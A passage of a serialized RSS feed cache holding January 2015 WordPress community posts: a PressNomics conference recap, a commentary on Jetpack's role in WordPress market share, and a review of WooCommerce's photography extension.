3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37944\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10754:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/WelcomeToPressNomicsFeaturedImage.png\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37971\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/WelcomeToPressNomicsFeaturedImage.png?resize=671%2C288\" alt=\"PressNomics Introduction\" /></a>PressNomics Introduction\n<p>Last week, I attended the third annual <a title=\"http://pressnomics.com/\" href=\"http://pressnomics.com/\">PressNomics conference</a> in Phoenix, AZ. The event focuses on the business side of the WordPress ecosystem and provides opportunities for business owners to learn from those who are blazing a path towards success. On the evening before PressNomics, I joined several business owners for dinner.</p>\n<p>A half hour into the meal, I listened intently to various conversations taking place around the table. Topics of conversation included: market segments, customer satisfaction, and business partnerships. At this point I realized I was definitely at a business conference.</p>\n<h2>The Family Delivers Opening Remarks</h2>\n<p>Joshua and Sally Strebel along with their kids, appeared on stage and delivered the opening remarks. It’s as if the family invited every attendee into their home for a family reunion.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/hashtag/PressNomics?src=hash\">#PressNomics</a> is getting started! <a href=\"http://t.co/DqFGdEidK4\">pic.twitter.com/DqFGdEidK4</a></p>\n<p>— Brian Krogsgard (@Krogsgard) <a href=\"https://twitter.com/Krogsgard/status/558295522725752833\">January 22, 2015</a></p></blockquote>\n<p></p>\n<p>Despite several competing businesses, companies, and products under one roof, I witnessed so many small groups of people discussing strategy as if they’re all friends. I felt a positive energy amongst the crowd and several attendees left the event in high spirits, ready to take their businesses to the next level.</p>\n<h2>Session Highlights</h2>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/30-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37973\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/30-Medium.jpg?resize=1024%2C768\" alt=\"A Room Full of Knowledge Seekers\" /></a>Name the people in this image\n<p>The room was packed with attendees for every session since PressNomics chose not to record or live stream the event. The following is a list of memorable points from the sessions I enjoyed most.</p>\n<p><strong>Joshua Strebel interviews Dre Armeda</strong></p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/35-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"wp-image-37976 size-full\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/35-Medium.jpg?resize=1024%2C768\" alt=\"Joshua Strebel Interviews Dre Armeda\" /></a>Joshua Strebel Interviews Dre Armeda\n<p>Joshua Strebel interviewed Dre Armeda on stage with a bottle of scotch. Aremda described how he became involved with WordPress and founded <a title=\"https://sucuri.net/\" href=\"https://sucuri.net/\">Sucuri</a>, where he turned a two-person part-time hobby into a multi-million dollar, 30+ employee company. He also talked about his role as Vice President of Operations for <a title=\"http://webdevstudios.com/\" href=\"http://webdevstudios.com/\">WebDevStudios</a>.</p>\n<p><strong>Ben Chan</strong></p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/40-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37978\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/40-Medium.jpg?resize=1024%2C768\" alt=\"Envato Stats via Ben Chan\" /></a>Envato Stats via Ben Chan\n<p>Ben Chan is the Director of Growth and Revenue at <a title=\"http://market.envato.com/\" href=\"http://market.envato.com/\">Envato</a>. The statistics he shared confirm that Envato is a huge player in various markets such as WordPress themes, audio files, and plugins. His slides are not available online, but I archived a few stats using Twitter. “Note that the earnings are before Envato takes their cut.”</p>\n<ul>\n<li>In the first 30 days, the <a title=\"http://themeforest.net/item/automotive-car-dealership-business-wordpress-theme/9210971\" href=\"http://themeforest.net/item/automotive-car-dealership-business-wordpress-theme/9210971\">Automotive theme</a> on ThemeForest had 300+ sales generating over $15K in sales.</li>\n<li>In less than 10 months, the WPlus theme had over 4K+ sales.</li>\n<li>In 2014, Visual Composer was the best selling plugin on CodeCanyon. The second best product is built on top of it.</li>\n<li>Easy Social Share buttons plugin by Appscreo has over 6K+ sales on CodeCanyon.</li>\n<li>Of the top 50 selling WordPress themes in 2014, 67% are new to the list versus 2013.</li>\n<li>79% of themes describe themselves as responsive, but make up 93% of overall earnings.</li>\n<li>Only 4% of themes in the ThemeForest marketplace have earned less than $1K in their lifetime.</li>\n<li>Envato supports initiatives in the WordPress community. One example is <a title=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\" href=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\">funding John James Jacoby</a> to work on GlotPress, bbPress, and BuddyPress full-time for six months.</li>\n</ul>\n<p><strong>Selena Larson</strong></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Helpful tips from <a href=\"https://twitter.com/selenalarson\">@selenalarson</a> on how startups can pitch, including getting known thru good comments <a href=\"https://twitter.com/hashtag/Pressnomics?src=hash\">#Pressnomics</a> <a href=\"http://t.co/c3hufKKspb\">pic.twitter.com/c3hufKKspb</a></p>\n<p>— Danny Sullivan (@dannysullivan) <a href=\"https://twitter.com/dannysullivan/status/558664527303041025\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p><a title=\"http://selenalarson.com/\" href=\"http://selenalarson.com/\">Selena Larson</a> who writes for <a title=\"http://www.dailydot.com/authors/selena-larson/\" href=\"http://www.dailydot.com/authors/selena-larson/\">the Daily Dot</a>, shared tips on how businesses can receive press by improving their pitches. I agreed with pretty much everything she said on the matter and hope those in attendance took notes. Here are a few highlights:</p>\n<ul>\n<li>Stop using jargon to pitch a product because no one talks like that.</li>\n<li>Describe your product, service, or business in two sentences or less.</li>\n<li>Balance your innovation with something that’s familiar. Don’t talk to reporters as if they’re investors because they’re not.</li>\n<li><a title=\"http://www.producthunt.com/\" href=\"http://www.producthunt.com/\">Product Hunt</a> is a good way to test the market or pitch a product without involving the press.</li>\n</ul>\n<p>As bonus material, be sure to read our guide on <a title=\"http://wptavern.com/tips-for-promoting-newly-released-wordpress-plugins\" href=\"http://wptavern.com/tips-for-promoting-newly-released-wordpress-plugins\">how to promote newly released plugins</a>.</p>\n<p><strong>Danny Sullivan</strong></p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/51-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37982\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/51-Medium.jpg?resize=1024%2C768\" alt=\"SEO With Danny Sullivan\" /></a>SEO With Danny Sullivan\n<p>Danny Sullivan, who is a Founding Editor of <a title=\"http://searchengineland.com/author/danny-sullivan\" href=\"http://searchengineland.com/author/danny-sullivan\">Search Engine Land</a>, presented on the topic of SEO. It’s a topic I’ve stayed away from and don’t talk about much, but Sullivan’s presentation was not only entertaining, it was enlightening. He showed a brief history of the Google homepage and described why numerous claims of SEO being dead are false.</p>\n<p>The one thing I took away from his presentation is that SEO will never die, but continue to evolve. Because of Sullivan’s presentation, I’m going to open my mind to SEO instead of writing it off.</p>\n<p><strong>Chris Lema</strong></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Things <a href=\"https://twitter.com/chrislema\">@chrislema</a> does daily <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a> <a href=\"https://twitter.com/hashtag/gtd?src=hash\">#gtd</a> <a href=\"http://t.co/WIBAlTCTkW\">pic.twitter.com/WIBAlTCTkW</a></p>\n<p>— Remkus de Vries (@DeFries) <a href=\"https://twitter.com/DeFries/status/558765203836268546\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>The CTO and Chief Strategist at <a href=\"http://crowdfavorite.com/\">Crowd Favorite</a>, Chris Lema, is one of my favorite speakers. He knows how to tell a story and keep the audience engaged. For this presentation, Lema shared tips and disciplines for getting things done. My favorite tip from his session is to start the day writing a list of three things you need to get done. Getting 2-3 items finished each day builds confidence and provides a historical record of things that are done.</p>\n<p>His stance on putting family first is an important strategy I need to work on. So far, listing three things to accomplish each day is working. I feel better about myself and it’s helping me figure out when I’ve had a good day.</p>\n<p>The last session featured Joshua Strebel interviewing Matt Mullenweg on stage, but I’m going to dissect that session in a separate post.</p>\n<h2>A Lot of Fun</h2>\n<p>Not only are the Strebels great hosts, they donated over $10K of proceeds from the event to the <a title=\"http://www.curesearch.org/\" href=\"http://www.curesearch.org/\">CureSearch</a> for Children’s Cancer charity. If there’s a PressNomics 4 and you’re involved in the economics of WordPress, I highly encourage you to attend.</p>\n<p>My goal was to be a fly on the wall for as many conversations as possible and I feel like I’ve accomplished that goal. I wouldn’t be surprised if several strategic partnerships are announced in the next few months with PressNomics being the birth place of the conversation.</p>\n<p>If you can’t wait for PressNomics 4, consider attending <a title=\"http://prestigeconf.com/tickets/\" href=\"http://prestigeconf.com/tickets/\">Prestige Las Vegas</a>, NV, February 27-28th. Similar to PressNomics, it’s a conference focused on the business side of WordPress.</p>\n<p>Here are a few other photos from the event.</p>\n<a href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3#gallery-37944-1-slideshow\">Click to view slideshow.</a>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 06:00:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: Kitchensink WP podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44636\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://ma.tt/2015/01/kitchensink-wp-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:180:\"<p><a href=\"http://kitchensinkwp.com/podcast-e048-interview-with-matt-mullenweg/\">I hopped on a podcast with Kitchensink WP to chat about the latest in the WordPress world</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 23:35:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: How Important is Jetpack on WordPress’ Road to 50% Market Share?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37907\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10465:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/07/jetpack-logo.gif\" rel=\"prettyphoto[37907]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/07/jetpack-logo.gif?resize=700%2C276\" alt=\"jetpack-logo\" class=\"aligncenter size-full wp-image-27470\" /></a></p>\n<p>This past weekend, 250 professionals gathered in Phoenix, Arizona for <a href=\"http://pressnomics.com/\" target=\"_blank\">Pressnomics</a>, a three-day event focused on entrepreneurship in the WordPress economy. During the last day, attendees had the opportunity to watch Pagely CEO <a href=\"http://saint-rebel.com/\" target=\"_blank\">Joshua Strebel</a> interview Matt Mullenweg. Although the session wasn’t recorded, the audience tweeted out the highlights of the interview, and discussion continued on Twitter.</p>\n<p>Strebel pressed Mullenweg on Automattic’s agenda behind <a href=\"http://jetpack.me/\" target=\"_blank\">Jetpack</a>.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>At <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a> <a href=\"https://twitter.com/strebel\">@strebel</a> refers to Jetpack as a Trojan Horse to <a href=\"https://twitter.com/photomatt\">@photomatt</a>, room goes silent</p>\n<p>— Yeti Support (@YetiSupport) <a href=\"https://twitter.com/YetiSupport/status/558772539032219648\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>This resulted in one of the most controversial statements to come out of the event:</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>“In the absence of <a href=\"https://twitter.com/jetpack\">@Jetpack</a>, I believe <a href=\"https://twitter.com/hashtag/WordPress?src=hash\">#WordPress</a> would be declining.” – <a href=\"https://twitter.com/photomatt\">@photomatt</a> <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a></p>\n<p>— Antony McGregor Dey (@antonymd) <a href=\"https://twitter.com/antonymd/status/558772451199299584\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>Mullenweg further clarified his statement on Twitter, essentially identifying Jetpack as a tool to bolster the platform against competition. Jetpack allows users to gain access to professionally-supported third party integrations without WordPress being forced to dump all of these features into the core software.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/zedejose\">@zedejose</a> <a href=\"https://twitter.com/mkalina\">@mkalina</a> <a href=\"https://twitter.com/jetpack\">@jetpack</a> <a href=\"https://twitter.com/antonymd\">@antonymd</a> Naked WordPress (without plugins) is not competitive to Wix, Weebly, Squarespace, etc.</p>\n<p>— Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/559559918898794496\">January 26, 2015</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/mkalina\">@mkalina</a> <a href=\"https://twitter.com/jetpack\">@jetpack</a> <a href=\"https://twitter.com/antonymd\">@antonymd</a> <a href=\"https://twitter.com/zedejose\">@zedejose</a> You should consider the rest: There\'s secular decline of non-mobile, non-social publishing systems.</p>\n<p>— Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/559532172596359168\">January 26, 2015</a></p></blockquote>\n<p></p>\n<p>Jetpack-enabled blogs have more features available to them on the WordPress mobile apps, which are wholly sponsored by Automattic. Many self-hosted WordPress users don’t appreciate the fact that the mobile apps are packed full of WordPress.com features, but, at the moment, there are no superior alternatives. In our most recent <a href=\"http://wptavern.com/matt-mullenweg-on-ensuring-the-future-of-wordpress\" target=\"_blank\">interview with Mullenweg</a>, he deftly addressed the friction caused by <a href=\"http://wptavern.com/poll-who-uses-reader-in-the-wordpress-mobile-apps\" target=\"_blank\">the preeminence of WordPress.com’s Reader in the app</a>, which he sees as a gateway that simplifies the onboarding process for new users.</p>\n<blockquote><p>I see it as a gateway drug and it gives people more options down the road. If we don’t do anything on mobile, five years from now, when everyone is only using mobile devices, they will all have Squarespace’s or Weebly’s. WordPress is still around but it just doesn’t matter. This allows us to matter five years from now.</p></blockquote>\n<p>With both Jetpack and the mobile apps, Mullenweg sees an opportunity for Automattic to provide functionality that goes beyond the core publishing experience to offer mobile access and connect users with readers and commenters via social networks.</p>\n<h3>The Road to 50% Market Share</h3>\n<p>In a recent <a href=\"http://kitchensinkwp.com/podcast-e048-interview-with-matt-mullenweg/\" target=\"_blank\">interview with Adam Silver on the KitchensinkWP podcast</a>, Mullenweg gave a better overall picture of his next goal for WordPress and how he sees the platform reaching more users in the future. The software is currently used on <a href=\"http://w3techs.com/technologies/overview/content_management/all\" target=\"_blank\">23.3% of websites worldwide</a> and is on track to reaching 25% before the end of the year. Mullenweg hopes to grow that number to 50%:</p>\n<blockquote><p>The next goal is the majority of websites. We want to get to 50%+ and there’s a lot of work between now and then. As the percentage increases, it gets harder and harder to grow the market share, and we have to grow the market share by doing things we haven’t done in the past – really thinking about the onboarding process, really thinking about the integration with social networks, and with how WordPress works on touch devices, which is going to be the predominant computing platform of the future. These things are going to be really important.</p>\n<p>What got us here isn’t going to get us there. Once we get to 50%, we can decide something new we want to do.</p></blockquote>\n<p>With a focus on the onboarding process, integration with social networks, and mobile publishing, Mullenweg is outlining how he sees the mobile apps and Jetpack entering the picture to grow the market share and prevent the decline of the platform.</p>\n<p>For Mullenweg, a 50% market share with a growing international user base isn’t a purely business goal, but rather ties back in with WordPress’ mission to democratize publishing with open source software. In response to Silver’s question on whether or not the recent focus on the mission is connected to an increase in non-English downloads, Mullenweg replied:</p>\n<blockquote><p>The big assumption in what we’re doing is that there’s an inherent goodness to the transparency and the ability for people to publish. Of course people use WordPress to publish things I personally disagree with or might find morally odious. But it’s very important that we provide the people the opportunity to have that voice. </p>\n<p>By giving everyone equal ability and access to reach the web, you’re a click away from several billion people. But you’re not if you don’t have the tools to really reach them. It’s not hunger or clean water or any of the big problems that society has, climate change, but at least for our little part in it, I think we can make a pretty big dent in it.</p></blockquote>\n<p>Mullenweg knew that WordPress had the potential to have an enormous impact on the world of publishing, even when the software was still batting in the minor leagues. WordPress.com was originally created to help users set up blogs while bypassing what used to be a complicated hosting and installation process. Over the years, as WordPress.com adapted more sophisticated ways of supporting the average WordPress user, the idea of Jetpack was born to connect self-hosted blogs with the same features.</p>\n<p>The question is whether or not Jetpack and the mobile apps are the missing link for helping users get connected to billions of people. While Jetpack’s features aren’t necessarily unique, they are professionally-supported and users feel safe banking on the plugin for the foreseeable future.</p>\n<p>Mullenweg’s controversial statement about WordPress being in decline without Jetpack was phrased as conjecture, because there’s no objective way to prove this unless you remove Jetpack from the picture entirely. As he further explained in his Twitter reply, the notion is based on witnessing the decline of other publishing systems that aren’t innovating with social or mobile features.</p>\n<p>Those who disagree with the statement object to the idea of hinging the success of WordPress’ market share on a plugin produced by a commercial entity. This is especially provocative when it comes to mobile, as Automattic’s agenda to promote WordPress.com features goes unrivaled. Nevertheless, WordPress wouldn’t have a mobile publishing platform without the company’s subsidy of the open source apps.</p>\n<p>If WordPress is dependent on Jetpack to continue building its market share to 50%, then the software’s future is inextricably tied to Automattic’s continued success. The company is one of a small few that have the capital to invest in a major plugin like Jetpack along with the ongoing improvement of the mobile apps.</p>\n<p>“Last year, Automattic raised a bit more funding than we have in the past,” Mullenweg told Silver in his interview. “It’s actually bigger than most IPO’s. We raised $160 million and that gives us a lot of capital to invest into the community. We’re able to make bigger bets, longer term bets, and it also solidifies us as an independent entity for many years to come.”</p>\n<p>The WordPress open source project can still be considered a success in terms of its mission, even if it doesn’t achieve a dominant market share. Tying its growth to Jetpack is a bold statement that eclipses some of WordPress’ best qualities, such as its rigid adherence to protecting user freedoms with the GPL, the strong community of contributors, and the massive ecosystem of products and services surrounding it. The availability of Jetpack may be one factor responsible for WordPress’ growing market share, but I don’t think it’s the sole tool saving WordPress from decline.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 22:27:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"Post Status: WooCommerce is going after photography\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=7728\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"https://poststatus.com/woocommerce-photography/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7576:\"<p>Photography is a huge — and quite competitive — market. WooThemes has one nice advantage, in that they are quite dominant in the eCommerce space.</p>\n<p>However, catering to actually selling photos is a whole new world. You’re talking about competing with dozens of services, some quite vertically integrated (from website, to photo management, to photo fulfillment), to a very picky audience full of people with unique workflows.</p>\n<p>I am not a photographer. However, last year I did a ton of research on photography product potential in the WordPress space. I was working with <a href=\"http://ran.ge\">Range</a>, and we were exploring creating our own photography product. I interviewed a dozen professional photographers in person, ranging in industry, experience, and company size.</p>\n<p>I learned a lot during that research phase; and one thing I learned is that this is no easy venture.</p>\n<p>The new WooCommerce photography extension does one thing quite nicely: it allows a photographer to create albums where customers can bulk purchase photos, and it allows the photographer to upload the photos for purchase, as well as protect the albums so that only the photography client can view them.</p>\n<p>You can view a marketing video, walkthrough video, and screenshots for <a href=\"http://www.woothemes.com/products/woocommerce-photography/\">WooThemes’ Photography extension</a> on the dedicated product page.</p>\n<h3>Considerations for true professional photo management / sales</h3>\n<p>However, that is one piece of the puzzle. This plugin makes the client-side of ordering relatively painless, but there are other elements to think about:</p>\n<ul>\n<li>Narrowing an album from a lot of photos to fewer photos</li>\n<li>Choosing to make an album visible to a wedding party or others that may want to purchase, in addition to a client</li>\n<li>Creating a more visual gallery of an album, versus a “purchase” view</li>\n<li>Enabling uploads to be synchronous with an editing tool, like Lightroom</li>\n<li>Enabling categorization, automated meta data, and various grouping mechanisms for photos</li>\n<li>The ability to quickly send the same or select photos from a client-viewed album to a new gallery for a blog post about a client event</li>\n<li>Integrating a photo fulfillment service, to actually print and deliver purchased photos</li>\n<li>And much more</li>\n</ul>\n<p>I’m sure WooThemes has done a good bit of research for this product. However, I think they’ve made a feature that’s not yet ready for your every day photographer. Of the photographers I met, most lamented the experience of creating, managing, and selling photos and albums.</p>\n<p>I think that there is a lot of room in the self-hosted photography space, and my reasoning is simple. Right now, selling photos and managing albums, client review, etc., on hosted services is super expensive. Plenty of services charge hundreds or even thousands of dollars per year, and/or charge massive per-purchase fees (like 10%+).</p>\n<p>A self-hosted, WordPress-integrated photography management solution — built for WordPress professionals — could be a million dollar idea on its own. I think WooCommerce creating this add-on is an interesting start, but I believe the concept has major legs that could grow into something huge.</p>\n<h3>Here are some other players in the market</h3>\n<p>Let’s start within the WordPress space:</p>\n<ul>\n<li><a href=\"http://www.photocrati.com/photography-wordpress-themes/\">Photocrati</a> — a theme plus eCommerce, gallery, and other features (these are the folks behind NextGen)</li>\n<li><a href=\"https://graphpaperpress.com/plugins/sell-media/\">Sell Media</a> — Graph Paper Press’s spin on selling media and prints. If I recall correctly, this is a fork of EDD customized for their photo-heavy theme collection</li>\n<li><a href=\"http://www.prophoto.com/explore-features/\">ProPhoto</a> — hideous but one of the more “full service” photography website options, minus selling</li>\n<li><a href=\"https://easydigitaldownloads.com/\">Easy Digital Downloads</a> — Out of the box, EDD could be used for selling photos</li>\n<li><a href=\"https://ithemes.com/exchange/\">Exchange</a> — Out of the box, Exchange could be used for selling photos</li>\n</ul>\n<p>No WordPress product is really providing a full solution though. Plenty of non-WordPress products are trying. Here are some that are interseting to look into:</p>\n<ul>\n<li><a href=\"http://www.smugmug.com/pro\">SmugMug</a> — A compelling, hosted option. Probably the most interesting in the market.</li>\n<li><a href=\"http://www.instaproofs.com/home/how-it-works.html\">InstaProofs</a> — A widely used method for proofing, selling, and fulfilling photo orders. (Requires 8%-15% commissions!)</li>\n<li><a href=\"https://discover.pictage.com/features\">Pictage</a> & <a href=\"https://web.shootq.com/\">ShootQ</a> — The most vertically integrated options: from initial lead to photo fulfillment. These two are quite popular, but are expensive SaaS products.</li>\n<li>There are loads of these, but these are popular ones, and give you an idea of what WordPress-oriented products are up against.</li>\n</ul>\n<h3>I don’t envy professional photographers on the web</h3>\n<p>Professional photographers have a lot to juggle.</p>\n<p>They’ve got to manage leads, their website copy, their contacts and CRM, their galleries and portfolio, their client albums and workflow, their events, their raw copies of photos and backups, the ability for clients to buy from them, and more.</p>\n<p>Managing this entire setup online is possible, but right now a photographer with a WordPress website and a third party system for album reviews, sales, and leads is kind of lame.</p>\n<p><span class=\"pullquote alignright\">I think WordPress can do a better job, and reduce expenses for professional photographers, while enabling them to have a more synchronized web experience for their clients.</span> I think WooCommerce introducing a Photography extension is one piece of the puzzle, but it doesn’t solve the over-arching problem.</p>\n<p>I truly believe someone could create a theme and plugin shop that competes with these third parties. But it needs to have a lot going for it: beautiful display, an easy to use interface (I’m not sure the back-end of WordPress counts as this), help photographers not continuously repeat themselves during photo management, and generally make their life as a professional photographer easier.</p>\n<p>Hosted services are tackling this problem. Those photographers managing their websites on WordPress may have more freedom and lower costs, but right now the experience isn’t easier.</p>\n<p>WooThemes is making a good first step. I’m not sure that they are the right team to really go 100% though. I’d be interested to see another company build something integrated into this product from WooThemes (or another WordPress eCommerce product) and really solve professional photographers’ workflow grievances.</p>\n<p>Like I said, I interviewed about a dozen photographers from different backgrounds. None of those interviewed felt particularly satisfied with their web workflows. There is room in this market. My question is: who will fulfill their needs?</p>\n<p>I think it can be a self-hosted product or hosted product, or both. But I think WordPress should be an excellent tool for photographers, and right now it’s not.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 21:30:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n 